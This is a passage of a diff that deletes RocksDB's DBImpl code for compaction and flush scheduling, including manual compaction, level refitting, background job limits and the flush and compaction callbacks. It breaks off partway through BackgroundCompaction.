-                 // pass a pointer of CompactionJobStats as the out-value
-                 // instead of using EventListener.
-
-  // Creating a compaction influences the compaction score because the score
-  // takes running compactions into account (by skipping files that are already
-  // being compacted). Since we just changed compaction score, we recalculate it
-  // here.
-  version->storage_info()->ComputeCompactionScore(*cfd->ioptions(),
-                                                  *c->mutable_cf_options());
-
-  compaction_job.Prepare();
-
-  mutex_.Unlock();
-  TEST_SYNC_POINT("CompactFilesImpl:0");
-  TEST_SYNC_POINT("CompactFilesImpl:1");
-  compaction_job.Run();
-  TEST_SYNC_POINT("CompactFilesImpl:2");
-  TEST_SYNC_POINT("CompactFilesImpl:3");
-  mutex_.Lock();
-
-  Status status = compaction_job.Install(*c->mutable_cf_options());
-  if (status.ok()) {
-    InstallSuperVersionAndScheduleWorkWrapper(
-        c->column_family_data(), job_context, *c->mutable_cf_options());
-  }
-  c->ReleaseCompactionFiles(s);
-
-  ReleaseFileNumberFromPendingOutputs(pending_outputs_inserted_elem);
-
-  if (status.ok()) {
-    // Done
-  } else if (status.IsShutdownInProgress()) {
-    // Ignore compaction errors found during shutting down
-  } else {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                   "[%s] [JOB %d] Compaction error: %s",
-                   c->column_family_data()->GetName().c_str(),
-                   job_context->job_id, status.ToString().c_str());
-    if (immutable_db_options_.paranoid_checks && bg_error_.ok()) {
-      Status new_bg_error = status;
-      // may temporarily unlock and lock the mutex.
-      EventHelpers::NotifyOnBackgroundError(immutable_db_options_.listeners,
-                                            BackgroundErrorReason::kCompaction,
-                                            &new_bg_error, &mutex_);
-      if (!new_bg_error.ok()) {
-        bg_error_ = new_bg_error;
-      }
-    }
-  }
-
-  c.reset();
-
-  bg_compaction_scheduled_--;
-  if (bg_compaction_scheduled_ == 0) {
-    bg_cv_.SignalAll();
-  }
-
-  return status;
-}
-#endif  // ROCKSDB_LITE
-
-Status DBImpl::PauseBackgroundWork() {
-  InstrumentedMutexLock guard_lock(&mutex_);
-  bg_compaction_paused_++;
-  while (bg_bottom_compaction_scheduled_ > 0 || bg_compaction_scheduled_ > 0 ||
-         bg_flush_scheduled_ > 0) {
-    bg_cv_.Wait();
-  }
-  bg_work_paused_++;
-  return Status::OK();
-}
-
-Status DBImpl::ContinueBackgroundWork() {
-  InstrumentedMutexLock guard_lock(&mutex_);
-  if (bg_work_paused_ == 0) {
-    return Status::InvalidArgument();
-  }
-  assert(bg_work_paused_ > 0);
-  assert(bg_compaction_paused_ > 0);
-  bg_compaction_paused_--;
-  bg_work_paused_--;
-  // It's sufficient to check just bg_work_paused_ here since
-  // bg_work_paused_ is always no greater than bg_compaction_paused_
-  if (bg_work_paused_ == 0) {
-    MaybeScheduleFlushOrCompaction();
-  }
-  return Status::OK();
-}
-
-void DBImpl::NotifyOnCompactionCompleted(
-    ColumnFamilyData* cfd, Compaction *c, const Status &st,
-    const CompactionJobStats& compaction_job_stats,
-    const int job_id) {
-#ifndef ROCKSDB_LITE
-  if (immutable_db_options_.listeners.size() == 0U) {
-    return;
-  }
-  mutex_.AssertHeld();
-  if (shutting_down_.load(std::memory_order_acquire)) {
-    return;
-  }
-  // release lock while notifying events
-  mutex_.Unlock();
-  TEST_SYNC_POINT("DBImpl::NotifyOnCompactionCompleted::UnlockMutex");
-  {
-    CompactionJobInfo info;
-    info.cf_name = cfd->GetName();
-    info.status = st;
-    info.thread_id = env_->GetThreadID();
-    info.job_id = job_id;
-    info.base_input_level = c->start_level();
-    info.output_level = c->output_level();
-    info.stats = compaction_job_stats;
-    info.table_properties = c->GetOutputTableProperties();
-    info.compaction_reason = c->compaction_reason();
-    info.compression = c->output_compression();
-    for (size_t i = 0; i < c->num_input_levels(); ++i) {
-      for (const auto fmd : *c->inputs(i)) {
-        auto fn = TableFileName(immutable_db_options_.db_paths,
-                                fmd->fd.GetNumber(), fmd->fd.GetPathId());
-        info.input_files.push_back(fn);
-        if (info.table_properties.count(fn) == 0) {
-          std::shared_ptr<const TableProperties> tp;
-          auto s = cfd->current()->GetTableProperties(&tp, fmd, &fn);
-          if (s.ok()) {
-            info.table_properties[fn] = tp;
-          }
-        }
-      }
-    }
-    for (const auto newf : c->edit()->GetNewFiles()) {
-      info.output_files.push_back(TableFileName(immutable_db_options_.db_paths,
-                                                newf.second.fd.GetNumber(),
-                                                newf.second.fd.GetPathId()));
-    }
-    for (auto listener : immutable_db_options_.listeners) {
-      listener->OnCompactionCompleted(this, info);
-    }
-  }
-  mutex_.Lock();
-  // no need to signal bg_cv_ as it will be signaled at the end of the
-  // flush process.
-#endif  // ROCKSDB_LITE
-}
-
-// REQUIREMENT: block all background work by calling PauseBackgroundWork()
-// before calling this function
-Status DBImpl::ReFitLevel(ColumnFamilyData* cfd, int level, int target_level) {
-  assert(level < cfd->NumberLevels());
-  if (target_level >= cfd->NumberLevels()) {
-    return Status::InvalidArgument("Target level exceeds number of levels");
-  }
-
-  std::unique_ptr<SuperVersion> superversion_to_free;
-  std::unique_ptr<SuperVersion> new_superversion(new SuperVersion());
-
-  Status status;
-
-  InstrumentedMutexLock guard_lock(&mutex_);
-
-  // only allow one thread refitting
-  if (refitting_level_) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                   "[ReFitLevel] another thread is refitting");
-    return Status::NotSupported("another thread is refitting");
-  }
-  refitting_level_ = true;
-
-  const MutableCFOptions mutable_cf_options = *cfd->GetLatestMutableCFOptions();
-  // move to a smaller level
-  int to_level = target_level;
-  if (target_level < 0) {
-    to_level = FindMinimumEmptyLevelFitting(cfd, mutable_cf_options, level);
-  }
-
-  auto* vstorage = cfd->current()->storage_info();
-  if (to_level > level) {
-    if (level == 0) {
-      return Status::NotSupported(
-          "Cannot change from level 0 to other levels.");
-    }
-    // Check levels are empty for a trivial move
-    for (int l = level + 1; l <= to_level; l++) {
-      if (vstorage->NumLevelFiles(l) > 0) {
-        return Status::NotSupported(
-            "Levels between source and target are not empty for a move.");
-      }
-    }
-  }
-  if (to_level != level) {
-    ROCKS_LOG_DEBUG(immutable_db_options_.info_log,
-                    "[%s] Before refitting:\n%s", cfd->GetName().c_str(),
-                    cfd->current()->DebugString().data());
-
-    VersionEdit edit;
-    edit.SetColumnFamily(cfd->GetID());
-    for (const auto& f : vstorage->LevelFiles(level)) {
-      edit.DeleteFile(level, f->fd.GetNumber());
-      edit.AddFile(to_level, f->fd.GetNumber(), f->fd.GetPathId(),
-                   f->fd.GetFileSize(), f->smallest, f->largest,
-                   f->smallest_seqno, f->largest_seqno,
-                   f->marked_for_compaction);
-    }
-    ROCKS_LOG_DEBUG(immutable_db_options_.info_log,
-                    "[%s] Apply version edit:\n%s", cfd->GetName().c_str(),
-                    edit.DebugString().data());
-
-    status = versions_->LogAndApply(cfd, mutable_cf_options, &edit, &mutex_,
-                                    directories_.GetDbDir());
-    superversion_to_free.reset(InstallSuperVersionAndScheduleWork(
-        cfd, new_superversion.release(), mutable_cf_options));
-
-    ROCKS_LOG_DEBUG(immutable_db_options_.info_log, "[%s] LogAndApply: %s\n",
-                    cfd->GetName().c_str(), status.ToString().data());
-
-    if (status.ok()) {
-      ROCKS_LOG_DEBUG(immutable_db_options_.info_log,
-                      "[%s] After refitting:\n%s", cfd->GetName().c_str(),
-                      cfd->current()->DebugString().data());
-    }
-  }
-
-  refitting_level_ = false;
-
-  return status;
-}
-
-int DBImpl::NumberLevels(ColumnFamilyHandle* column_family) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  return cfh->cfd()->NumberLevels();
-}
-
-int DBImpl::MaxMemCompactionLevel(ColumnFamilyHandle* column_family) {
-  return 0;
-}
-
-int DBImpl::Level0StopWriteTrigger(ColumnFamilyHandle* column_family) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  InstrumentedMutexLock l(&mutex_);
-  return cfh->cfd()->GetSuperVersion()->
-      mutable_cf_options.level0_stop_writes_trigger;
-}
-
-Status DBImpl::Flush(const FlushOptions& flush_options,
-                     ColumnFamilyHandle* column_family) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  return FlushMemTable(cfh->cfd(), flush_options);
-}
-
-Status DBImpl::RunManualCompaction(ColumnFamilyData* cfd, int input_level,
-                                   int output_level, uint32_t output_path_id,
-                                   const Slice* begin, const Slice* end,
-                                   bool exclusive, bool disallow_trivial_move) {
-  assert(input_level == ColumnFamilyData::kCompactAllLevels ||
-         input_level >= 0);
-
-  InternalKey begin_storage, end_storage;
-  CompactionArg* ca;
-
-  bool scheduled = false;
-  bool manual_conflict = false;
-  ManualCompactionState manual;
-  manual.cfd = cfd;
-  manual.input_level = input_level;
-  manual.output_level = output_level;
-  manual.output_path_id = output_path_id;
-  manual.done = false;
-  manual.in_progress = false;
-  manual.incomplete = false;
-  manual.exclusive = exclusive;
-  manual.disallow_trivial_move = disallow_trivial_move;
-  // For universal compaction, we enforce every manual compaction to compact
-  // all files.
-  if (begin == nullptr ||
-      cfd->ioptions()->compaction_style == kCompactionStyleUniversal ||
-      cfd->ioptions()->compaction_style == kCompactionStyleFIFO) {
-    manual.begin = nullptr;
-  } else {
-    begin_storage.SetMaxPossibleForUserKey(*begin);
-    manual.begin = &begin_storage;
-  }
-  if (end == nullptr ||
-      cfd->ioptions()->compaction_style == kCompactionStyleUniversal ||
-      cfd->ioptions()->compaction_style == kCompactionStyleFIFO) {
-    manual.end = nullptr;
-  } else {
-    end_storage.SetMinPossibleForUserKey(*end);
-    manual.end = &end_storage;
-  }
-
-  TEST_SYNC_POINT("DBImpl::RunManualCompaction:0");
-  TEST_SYNC_POINT("DBImpl::RunManualCompaction:1");
-  InstrumentedMutexLock l(&mutex_);
-
-  // When a manual compaction arrives, temporarily disable scheduling of
-  // non-manual compactions and wait until the number of scheduled compaction
-  // jobs drops to zero. This is needed to ensure that this manual compaction
-  // can compact any range of keys/files.
-  //
-  // HasPendingManualCompaction() is true when at least one thread is inside
-  // RunManualCompaction(), i.e. during that time no other compaction will
-  // get scheduled (see MaybeScheduleFlushOrCompaction).
-  //
-  // Note that the following loop doesn't stop more that one thread calling
-  // RunManualCompaction() from getting to the second while loop below.
-  // However, only one of them will actually schedule compaction, while
-  // others will wait on a condition variable until it completes.
-
-  AddManualCompaction(&manual);
-  TEST_SYNC_POINT_CALLBACK("DBImpl::RunManualCompaction:NotScheduled", &mutex_);
-  if (exclusive) {
-    while (bg_bottom_compaction_scheduled_ > 0 ||
-           bg_compaction_scheduled_ > 0) {
-      TEST_SYNC_POINT("DBImpl::RunManualCompaction:WaitScheduled");
-      ROCKS_LOG_INFO(
-          immutable_db_options_.info_log,
-          "[%s] Manual compaction waiting for all other scheduled background "
-          "compactions to finish",
-          cfd->GetName().c_str());
-      bg_cv_.Wait();
-    }
-  }
-
-  ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                 "[%s] Manual compaction starting", cfd->GetName().c_str());
-
-  // We don't check bg_error_ here, because if we get the error in compaction,
-  // the compaction will set manual.status to bg_error_ and set manual.done to
-  // true.
-  while (!manual.done) {
-    assert(HasPendingManualCompaction());
-    manual_conflict = false;
-    Compaction* compaction;
-    if (ShouldntRunManualCompaction(&manual) || (manual.in_progress == true) ||
-        scheduled ||
-        ((manual.manual_end = &manual.tmp_storage1) &&
-         ((compaction = manual.cfd->CompactRange(
-               *manual.cfd->GetLatestMutableCFOptions(), manual.input_level,
-               manual.output_level, manual.output_path_id, manual.begin,
-               manual.end, &manual.manual_end, &manual_conflict)) == nullptr) &&
-         manual_conflict)) {
-      // exclusive manual compactions should not see a conflict during
-      // CompactRange
-      assert(!exclusive || !manual_conflict);
-      // Running either this or some other manual compaction
-      bg_cv_.Wait();
-      if (scheduled && manual.incomplete == true) {
-        assert(!manual.in_progress);
-        scheduled = false;
-        manual.incomplete = false;
-      }
-    } else if (!scheduled) {
-      if (compaction == nullptr) {
-        manual.done = true;
-        bg_cv_.SignalAll();
-        continue;
-      }
-      ca = new CompactionArg;
-      ca->db = this;
-      ca->prepicked_compaction = new PrepickedCompaction;
-      ca->prepicked_compaction->manual_compaction_state = &manual;
-      ca->prepicked_compaction->compaction = compaction;
-      manual.incomplete = false;
-      bg_compaction_scheduled_++;
-      env_->Schedule(&DBImpl::BGWorkCompaction, ca, Env::Priority::LOW, this,
-                     &DBImpl::UnscheduleCallback);
-      scheduled = true;
-    }
-  }
-
-  assert(!manual.in_progress);
-  assert(HasPendingManualCompaction());
-  RemoveManualCompaction(&manual);
-  bg_cv_.SignalAll();
-  return manual.status;
-}
-
-Status DBImpl::FlushMemTable(ColumnFamilyData* cfd,
-                             const FlushOptions& flush_options,
-                             bool writes_stopped) {
-  Status s;
-  {
-    WriteContext context;
-    InstrumentedMutexLock guard_lock(&mutex_);
-
-    if (cfd->imm()->NumNotFlushed() == 0 && cfd->mem()->IsEmpty()) {
-      // Nothing to flush
-      return Status::OK();
-    }
-
-    WriteThread::Writer w;
-    if (!writes_stopped) {
-      write_thread_.EnterUnbatched(&w, &mutex_);
-    }
-
-    // SwitchMemtable() will release and reacquire mutex
-    // during execution
-    s = SwitchMemtable(cfd, &context);
-
-    if (!writes_stopped) {
-      write_thread_.ExitUnbatched(&w);
-    }
-
-    cfd->imm()->FlushRequested();
-
-    // schedule flush
-    SchedulePendingFlush(cfd);
-    MaybeScheduleFlushOrCompaction();
-  }
-
-  if (s.ok() && flush_options.wait) {
-    // Wait until the compaction completes
-    s = WaitForFlushMemTable(cfd);
-  }
-  return s;
-}
-
-Status DBImpl::WaitForFlushMemTable(ColumnFamilyData* cfd) {
-  Status s;
-  // Wait until the compaction completes
-  InstrumentedMutexLock l(&mutex_);
-  while (cfd->imm()->NumNotFlushed() > 0 && bg_error_.ok()) {
-    if (shutting_down_.load(std::memory_order_acquire)) {
-      return Status::ShutdownInProgress();
-    }
-    if (cfd->IsDropped()) {
-      // FlushJob cannot flush a dropped CF, if we did not break here
-      // we will loop forever since cfd->imm()->NumNotFlushed() will never
-      // drop to zero
-      return Status::InvalidArgument("Cannot flush a dropped CF");
-    }
-    bg_cv_.Wait();
-  }
-  if (!bg_error_.ok()) {
-    s = bg_error_;
-  }
-  return s;
-}
-
-Status DBImpl::EnableAutoCompaction(
-    const std::vector<ColumnFamilyHandle*>& column_family_handles) {
-  Status s;
-  for (auto cf_ptr : column_family_handles) {
-    Status status =
-        this->SetOptions(cf_ptr, {{"disable_auto_compactions", "false"}});
-    if (!status.ok()) {
-      s = status;
-    }
-  }
-
-  return s;
-}
-
-void DBImpl::MaybeScheduleFlushOrCompaction() {
-  mutex_.AssertHeld();
-  if (!opened_successfully_) {
-    // Compaction may introduce data race to DB open
-    return;
-  }
-  if (bg_work_paused_ > 0) {
-    // we paused the background work
-    return;
-  } else if (shutting_down_.load(std::memory_order_acquire)) {
-    // DB is being deleted; no more background compactions
-    return;
-  }
-  auto bg_job_limits = GetBGJobLimits();
-  bool is_flush_pool_empty =
-    env_->GetBackgroundThreads(Env::Priority::HIGH) == 0;
-  while (!is_flush_pool_empty && unscheduled_flushes_ > 0 &&
-         bg_flush_scheduled_ < bg_job_limits.max_flushes) {
-    unscheduled_flushes_--;
-    bg_flush_scheduled_++;
-    env_->Schedule(&DBImpl::BGWorkFlush, this, Env::Priority::HIGH, this);
-  }
-
-  // special case -- if high-pri (flush) thread pool is empty, then schedule
-  // flushes in low-pri (compaction) thread pool.
-  if (is_flush_pool_empty) {
-    while (unscheduled_flushes_ > 0 &&
-           bg_flush_scheduled_ + bg_compaction_scheduled_ <
-               bg_job_limits.max_flushes) {
-      unscheduled_flushes_--;
-      bg_flush_scheduled_++;
-      env_->Schedule(&DBImpl::BGWorkFlush, this, Env::Priority::LOW, this);
-    }
-  }
-
-  if (bg_compaction_paused_ > 0) {
-    // we paused the background compaction
-    return;
-  }
-
-  if (HasExclusiveManualCompaction()) {
-    // only manual compactions are allowed to run. don't schedule automatic
-    // compactions
-    return;
-  }
-
-  while (bg_compaction_scheduled_ < bg_job_limits.max_compactions &&
-         unscheduled_compactions_ > 0) {
-    CompactionArg* ca = new CompactionArg;
-    ca->db = this;
-    ca->prepicked_compaction = nullptr;
-    bg_compaction_scheduled_++;
-    unscheduled_compactions_--;
-    env_->Schedule(&DBImpl::BGWorkCompaction, ca, Env::Priority::LOW, this,
-                   &DBImpl::UnscheduleCallback);
-  }
-}
-
-DBImpl::BGJobLimits DBImpl::GetBGJobLimits() const {
-  mutex_.AssertHeld();
-  return GetBGJobLimits(immutable_db_options_.max_background_flushes,
-                        mutable_db_options_.max_background_compactions,
-                        mutable_db_options_.max_background_jobs,
-                        write_controller_.NeedSpeedupCompaction());
-}
-
-DBImpl::BGJobLimits DBImpl::GetBGJobLimits(int max_background_flushes,
-                                           int max_background_compactions,
-                                           int max_background_jobs,
-                                           bool parallelize_compactions) {
-  BGJobLimits res;
-  if (max_background_flushes == -1 && max_background_compactions == -1) {
-    // for our first stab implementing max_background_jobs, simply allocate a
-    // quarter of the threads to flushes.
-    res.max_flushes = std::max(1, max_background_jobs / 4);
-    res.max_compactions = std::max(1, max_background_jobs - res.max_flushes);
-  } else {
-    // compatibility code in case users haven't migrated to max_background_jobs,
-    // which automatically computes flush/compaction limits
-    res.max_flushes = std::max(1, max_background_flushes);
-    res.max_compactions = std::max(1, max_background_compactions);
-  }
-  if (!parallelize_compactions) {
-    // throttle background compactions until we deem necessary
-    res.max_compactions = 1;
-  }
-  return res;
-}
-
-void DBImpl::AddToCompactionQueue(ColumnFamilyData* cfd) {
-  assert(!cfd->pending_compaction());
-  cfd->Ref();
-  compaction_queue_.push_back(cfd);
-  cfd->set_pending_compaction(true);
-}
-
-ColumnFamilyData* DBImpl::PopFirstFromCompactionQueue() {
-  assert(!compaction_queue_.empty());
-  auto cfd = *compaction_queue_.begin();
-  compaction_queue_.pop_front();
-  assert(cfd->pending_compaction());
-  cfd->set_pending_compaction(false);
-  return cfd;
-}
-
-void DBImpl::AddToFlushQueue(ColumnFamilyData* cfd) {
-  assert(!cfd->pending_flush());
-  cfd->Ref();
-  flush_queue_.push_back(cfd);
-  cfd->set_pending_flush(true);
-}
-
-ColumnFamilyData* DBImpl::PopFirstFromFlushQueue() {
-  assert(!flush_queue_.empty());
-  auto cfd = *flush_queue_.begin();
-  flush_queue_.pop_front();
-  assert(cfd->pending_flush());
-  cfd->set_pending_flush(false);
-  return cfd;
-}
-
-void DBImpl::SchedulePendingFlush(ColumnFamilyData* cfd) {
-  if (!cfd->pending_flush() && cfd->imm()->IsFlushPending()) {
-    AddToFlushQueue(cfd);
-    ++unscheduled_flushes_;
-  }
-}
-
-void DBImpl::SchedulePendingCompaction(ColumnFamilyData* cfd) {
-  if (!cfd->pending_compaction() && cfd->NeedsCompaction()) {
-    AddToCompactionQueue(cfd);
-    ++unscheduled_compactions_;
-  }
-}
-
-void DBImpl::SchedulePendingPurge(std::string fname, FileType type,
-                                  uint64_t number, uint32_t path_id,
-                                  int job_id) {
-  mutex_.AssertHeld();
-  PurgeFileInfo file_info(fname, type, number, path_id, job_id);
-  purge_queue_.push_back(std::move(file_info));
-}
-
-void DBImpl::BGWorkFlush(void* db) {
-  IOSTATS_SET_THREAD_POOL_ID(Env::Priority::HIGH);
-  TEST_SYNC_POINT("DBImpl::BGWorkFlush");
-  reinterpret_cast<DBImpl*>(db)->BackgroundCallFlush();
-  TEST_SYNC_POINT("DBImpl::BGWorkFlush:done");
-}
-
-void DBImpl::BGWorkCompaction(void* arg) {
-  CompactionArg ca = *(reinterpret_cast<CompactionArg*>(arg));
-  delete reinterpret_cast<CompactionArg*>(arg);
-  IOSTATS_SET_THREAD_POOL_ID(Env::Priority::LOW);
-  TEST_SYNC_POINT("DBImpl::BGWorkCompaction");
-  auto prepicked_compaction =
-      static_cast<PrepickedCompaction*>(ca.prepicked_compaction);
-  reinterpret_cast<DBImpl*>(ca.db)->BackgroundCallCompaction(
-      prepicked_compaction, Env::Priority::LOW);
-  delete prepicked_compaction;
-}
-
-void DBImpl::BGWorkBottomCompaction(void* arg) {
-  CompactionArg ca = *(static_cast<CompactionArg*>(arg));
-  delete static_cast<CompactionArg*>(arg);
-  IOSTATS_SET_THREAD_POOL_ID(Env::Priority::BOTTOM);
-  TEST_SYNC_POINT("DBImpl::BGWorkBottomCompaction");
-  auto* prepicked_compaction = ca.prepicked_compaction;
-  assert(prepicked_compaction && prepicked_compaction->compaction &&
-         !prepicked_compaction->manual_compaction_state);
-  ca.db->BackgroundCallCompaction(prepicked_compaction, Env::Priority::BOTTOM);
-  delete prepicked_compaction;
-}
-
-void DBImpl::BGWorkPurge(void* db) {
-  IOSTATS_SET_THREAD_POOL_ID(Env::Priority::HIGH);
-  TEST_SYNC_POINT("DBImpl::BGWorkPurge:start");
-  reinterpret_cast<DBImpl*>(db)->BackgroundCallPurge();
-  TEST_SYNC_POINT("DBImpl::BGWorkPurge:end");
-}
-
-void DBImpl::UnscheduleCallback(void* arg) {
-  CompactionArg ca = *(reinterpret_cast<CompactionArg*>(arg));
-  delete reinterpret_cast<CompactionArg*>(arg);
-  if (ca.prepicked_compaction != nullptr) {
-    if (ca.prepicked_compaction->compaction != nullptr) {
-      delete ca.prepicked_compaction->compaction;
-    }
-    delete ca.prepicked_compaction;
-  }
-  TEST_SYNC_POINT("DBImpl::UnscheduleCallback");
-}
-
-Status DBImpl::BackgroundFlush(bool* made_progress, JobContext* job_context,
-                               LogBuffer* log_buffer) {
-  mutex_.AssertHeld();
-
-  Status status = bg_error_;
-  if (status.ok() && shutting_down_.load(std::memory_order_acquire)) {
-    status = Status::ShutdownInProgress();
-  }
-
-  if (!status.ok()) {
-    return status;
-  }
-
-  ColumnFamilyData* cfd = nullptr;
-  while (!flush_queue_.empty()) {
-    // This cfd is already referenced
-    auto first_cfd = PopFirstFromFlushQueue();
-
-    if (first_cfd->IsDropped() || !first_cfd->imm()->IsFlushPending()) {
-      // can't flush this CF, try next one
-      if (first_cfd->Unref()) {
-        delete first_cfd;
-      }
-      continue;
-    }
-
-    // found a flush!
-    cfd = first_cfd;
-    break;
-  }
-
-  if (cfd != nullptr) {
-    const MutableCFOptions mutable_cf_options =
-        *cfd->GetLatestMutableCFOptions();
-    auto bg_job_limits = GetBGJobLimits();
-    ROCKS_LOG_BUFFER(
-        log_buffer,
-        "Calling FlushMemTableToOutputFile with column "
-        "family [%s], flush slots available %d, compaction slots available %d, "
-        "flush slots scheduled %d, compaction slots scheduled %d",
-        cfd->GetName().c_str(), bg_job_limits.max_flushes,
-        bg_job_limits.max_compactions, bg_flush_scheduled_,
-        bg_compaction_scheduled_);
-    status = FlushMemTableToOutputFile(cfd, mutable_cf_options, made_progress,
-                                       job_context, log_buffer);
-    if (cfd->Unref()) {
-      delete cfd;
-    }
-  }
-  return status;
-}
-
-void DBImpl::BackgroundCallFlush() {
-  bool made_progress = false;
-  JobContext job_context(next_job_id_.fetch_add(1), true);
-
-  TEST_SYNC_POINT("DBImpl::BackgroundCallFlush:start");
-
-  LogBuffer log_buffer(InfoLogLevel::INFO_LEVEL,
-                       immutable_db_options_.info_log.get());
-  {
-    InstrumentedMutexLock l(&mutex_);
-    assert(bg_flush_scheduled_);
-    num_running_flushes_++;
-
-    auto pending_outputs_inserted_elem =
-        CaptureCurrentFileNumberInPendingOutputs();
-
-    Status s = BackgroundFlush(&made_progress, &job_context, &log_buffer);
-    if (!s.ok() && !s.IsShutdownInProgress()) {
-      // Wait a little bit before retrying background flush in
-      // case this is an environmental problem and we do not want to
-      // chew up resources for failed flushes for the duration of
-      // the problem.
-      uint64_t error_cnt =
-        default_cf_internal_stats_->BumpAndGetBackgroundErrorCount();
-      bg_cv_.SignalAll();  // In case a waiter can proceed despite the error
-      mutex_.Unlock();
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                      "Waiting after background flush error: %s"
-                      "Accumulated background error counts: %" PRIu64,
-                      s.ToString().c_str(), error_cnt);
-      log_buffer.FlushBufferToLog();
-      LogFlush(immutable_db_options_.info_log);
-      env_->SleepForMicroseconds(1000000);
-      mutex_.Lock();
-    }
-
-    ReleaseFileNumberFromPendingOutputs(pending_outputs_inserted_elem);
-
-    // If flush failed, we want to delete all temporary files that we might have
-    // created. Thus, we force full scan in FindObsoleteFiles()
-    FindObsoleteFiles(&job_context, !s.ok() && !s.IsShutdownInProgress());
-    // delete unnecessary files if any, this is done outside the mutex
-    if (job_context.HaveSomethingToDelete() || !log_buffer.IsEmpty()) {
-      mutex_.Unlock();
-      // Have to flush the info logs before bg_flush_scheduled_--
-      // because if bg_flush_scheduled_ becomes 0 and the lock is
-      // released, the deconstructor of DB can kick in and destroy all the
-      // states of DB so info_log might not be available after that point.
-      // It also applies to access other states that DB owns.
-      log_buffer.FlushBufferToLog();
-      if (job_context.HaveSomethingToDelete()) {
-        PurgeObsoleteFiles(job_context);
-      }
-      job_context.Clean();
-      mutex_.Lock();
-    }
-
-    assert(num_running_flushes_ > 0);
-    num_running_flushes_--;
-    bg_flush_scheduled_--;
-    // See if there's more work to be done
-    MaybeScheduleFlushOrCompaction();
-    bg_cv_.SignalAll();
-    // IMPORTANT: there should be no code after calling SignalAll. This call may
-    // signal the DB destructor that it's OK to proceed with destruction. In
-    // that case, all DB variables will be dealloacated and referencing them
-    // will cause trouble.
-  }
-}
-
-void DBImpl::BackgroundCallCompaction(PrepickedCompaction* prepicked_compaction,
-                                      Env::Priority bg_thread_pri) {
-  bool made_progress = false;
-  JobContext job_context(next_job_id_.fetch_add(1), true);
-  TEST_SYNC_POINT("BackgroundCallCompaction:0");
-  MaybeDumpStats();
-  LogBuffer log_buffer(InfoLogLevel::INFO_LEVEL,
-                       immutable_db_options_.info_log.get());
-  {
-    InstrumentedMutexLock l(&mutex_);
-
-    // This call will unlock/lock the mutex to wait for current running
-    // IngestExternalFile() calls to finish.
-    WaitForIngestFile();
-
-    num_running_compactions_++;
-
-    auto pending_outputs_inserted_elem =
-        CaptureCurrentFileNumberInPendingOutputs();
-
-    assert((bg_thread_pri == Env::Priority::BOTTOM &&
-            bg_bottom_compaction_scheduled_) ||
-           (bg_thread_pri == Env::Priority::LOW && bg_compaction_scheduled_));
-    Status s = BackgroundCompaction(&made_progress, &job_context, &log_buffer,
-                                    prepicked_compaction);
-    TEST_SYNC_POINT("BackgroundCallCompaction:1");
-    if (!s.ok() && !s.IsShutdownInProgress()) {
-      // Wait a little bit before retrying background compaction in
-      // case this is an environmental problem and we do not want to
-      // chew up resources for failed compactions for the duration of
-      // the problem.
-      uint64_t error_cnt =
-          default_cf_internal_stats_->BumpAndGetBackgroundErrorCount();
-      bg_cv_.SignalAll();  // In case a waiter can proceed despite the error
-      mutex_.Unlock();
-      log_buffer.FlushBufferToLog();
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                      "Waiting after background compaction error: %s, "
-                      "Accumulated background error counts: %" PRIu64,
-                      s.ToString().c_str(), error_cnt);
-      LogFlush(immutable_db_options_.info_log);
-      env_->SleepForMicroseconds(1000000);
-      mutex_.Lock();
-    }
-
-    ReleaseFileNumberFromPendingOutputs(pending_outputs_inserted_elem);
-
-    // If compaction failed, we want to delete all temporary files that we might
-    // have created (they might not be all recorded in job_context in case of a
-    // failure). Thus, we force full scan in FindObsoleteFiles()
-    FindObsoleteFiles(&job_context, !s.ok() && !s.IsShutdownInProgress());
-
-    // delete unnecessary files if any, this is done outside the mutex
-    if (job_context.HaveSomethingToDelete() || !log_buffer.IsEmpty()) {
-      mutex_.Unlock();
-      // Have to flush the info logs before bg_compaction_scheduled_--
-      // because if bg_flush_scheduled_ becomes 0 and the lock is
-      // released, the deconstructor of DB can kick in and destroy all the
-      // states of DB so info_log might not be available after that point.
-      // It also applies to access other states that DB owns.
-      log_buffer.FlushBufferToLog();
-      if (job_context.HaveSomethingToDelete()) {
-        PurgeObsoleteFiles(job_context);
-      }
-      job_context.Clean();
-      mutex_.Lock();
-    }
-
-    assert(num_running_compactions_ > 0);
-    num_running_compactions_--;
-    if (bg_thread_pri == Env::Priority::LOW) {
-      bg_compaction_scheduled_--;
-    } else {
-      assert(bg_thread_pri == Env::Priority::BOTTOM);
-      bg_bottom_compaction_scheduled_--;
-    }
-
-    versions_->GetColumnFamilySet()->FreeDeadColumnFamilies();
-
-    // See if there's more work to be done
-    MaybeScheduleFlushOrCompaction();
-    if (made_progress ||
-        (bg_compaction_scheduled_ == 0 &&
-         bg_bottom_compaction_scheduled_ == 0) ||
-        HasPendingManualCompaction()) {
-      // signal if
-      // * made_progress -- need to wakeup DelayWrite
-      // * bg_{bottom,}_compaction_scheduled_ == 0 -- need to wakeup ~DBImpl
-      // * HasPendingManualCompaction -- need to wakeup RunManualCompaction
-      // If none of this is true, there is no need to signal since nobody is
-      // waiting for it
-      bg_cv_.SignalAll();
-    }
-    // IMPORTANT: there should be no code after calling SignalAll. This call may
-    // signal the DB destructor that it's OK to proceed with destruction. In
-    // that case, all DB variables will be dealloacated and referencing them
-    // will cause trouble.
-  }
-}
-
-Status DBImpl::BackgroundCompaction(bool* made_progress,
-                                    JobContext* job_context,
-                                    LogBuffer* log_buffer,
-                                    PrepickedCompaction* prepicked_compaction) {
-  ManualCompactionState* manual_compaction =
-      prepicked_compaction == nullptr
-          ? nullptr
-          : prepicked_compaction->manual_compaction_state;
-  *made_progress = false;
-  mutex_.AssertHeld();
-  TEST_SYNC_POINT("DBImpl::BackgroundCompaction:Start");
-
-  bool is_manual = (manual_compaction != nullptr);
-  unique_ptr<Compaction> c;
-  if (prepicked_compaction != nullptr &&
-      prepicked_compaction->compaction != nullptr) {
-    c.reset(prepicked_compaction->compaction);
-  }
-  bool is_prepicked = is_manual || c;
-
-  // (manual_compaction->in_progress == false);
-  bool trivial_move_disallowed =
